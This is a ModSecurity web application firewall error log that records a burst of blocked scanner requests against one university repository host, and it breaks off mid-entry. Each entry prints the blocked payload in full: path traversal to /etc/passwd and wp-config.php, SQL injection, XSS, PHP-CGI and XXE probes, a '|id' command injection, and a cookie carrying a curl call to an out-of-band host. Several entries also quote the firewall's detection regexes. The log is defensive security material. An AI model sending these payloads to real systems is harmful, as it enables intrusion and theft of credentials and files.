[Tue Aug 29 11:41:09.578784 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAc2dOoAAAAN"]
[Tue Aug 29 11:41:09.606797 2023] [:error] [pid 1843] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO125cCo-f0AAAczXecAAAAL"]
[Tue Aug 29 11:41:10.423437 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO125sCo-f0AAAcYVAsAAAAp"]
[Tue Aug 29 11:41:10.436206 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO125sCo-f0AAAc2dPIAAAAN"]
[Tue Aug 29 11:41:13.361267 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO126cCo-f0AAAcyp10AAAAK"]
[Tue Aug 29 11:41:15.479513 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO1268Co-f0AAAcqJLIAAAAG"]
[Tue Aug 29 11:41:18.421703 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/"] [unique_id "ZO127sCo-f0AAAc2dQIAAAAN"]
[Tue Aug 29 11:41:19.350993 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO1278Co-f0AAAaZ9qkAAAAo"]
[Tue Aug 29 11:41:19.385704 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO1278Co-f0AAAcoNVUAAAAF"]
[Tue Aug 29 11:41:19.490204 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO1278Co-f0AAAcbSEcAAAAv"]
[Tue Aug 29 11:41:20.418997 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO128MCo-f0AAAcyp4IAAAAK"]
[Tue Aug 29 11:41:20.599381 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128MCo-f0AAAc4EmwAAAAP"]
[Tue Aug 29 11:41:20.665158 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128MCo-f0AAAc4Em8AAAAP"]
[Tue Aug 29 11:41:20.735154 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128MCo-f0AAAcqJM8AAAAG"]
[Tue Aug 29 11:41:20.786626 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128MCo-f0AAAaZ9rcAAAAo"]
[Tue Aug 29 11:41:21.804170 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26gemk9kxm3rx7zh.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128cCo-f0AAAc0NfIAAAAM"]
[Tue Aug 29 11:41:23.451689 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO1288Co-f0AAAYf-RYAAAAD"]
[Tue Aug 29 11:41:23.452487 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO1288Co-f0AAAQkBbkAAAAC"]
[Tue Aug 29 11:41:24.451165 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO129MCo-f0AAAYf-RsAAAAD"]
[Tue Aug 29 11:41:24.535516 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:pattern. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:pattern: <svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/config/postProcessing/testNaming"] [unique_id "ZO129MCo-f0AAAYf-R8AAAAD"]
[Tue Aug 29 11:41:25.361527 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO129cCo-f0AAAUKhFoAAABC"]
[Tue Aug 29 11:41:25.506923 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAcoNWQAAAAF"]
[Tue Aug 29 11:41:26.363148 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAcriioAAAAB"]
[Tue Aug 29 11:41:26.437666 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAc2dTAAAAAN"]
[Tue Aug 29 11:41:26.559893 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO129sCo-f0AAAaZ9toAAAAo"]
[Tue Aug 29 11:41:26.609669 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO129sCo-f0AAAcrii8AAAAB"]
[Tue Aug 29 11:41:27.547010 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO1298Co-f0AAAcoNXIAAAAF"]
[Tue Aug 29 11:41:28.412948 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g6whs58owbafqk.oast.site found within TX:1: cjmnbitjmimt14dgn26g6whs58owbafqk.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@MCo-f0AAAc2dToAAAAN"]
[Tue Aug 29 11:41:30.384596 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26gypcaa1db5ok1i.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@sCo-f0AAAQSWpUAAAA0"]
[Tue Aug 29 11:41:30.675450 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@sCo-f0AAAQSWpoAAAA0"]
[Tue Aug 29 11:41:32.385402 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-MCo-f0AAAcbSIsAAAAv"]
[Tue Aug 29 11:41:32.605433 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-MCo-f0AAAbo-aIAAAAi"]
[Tue Aug 29 11:41:34.392300 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id 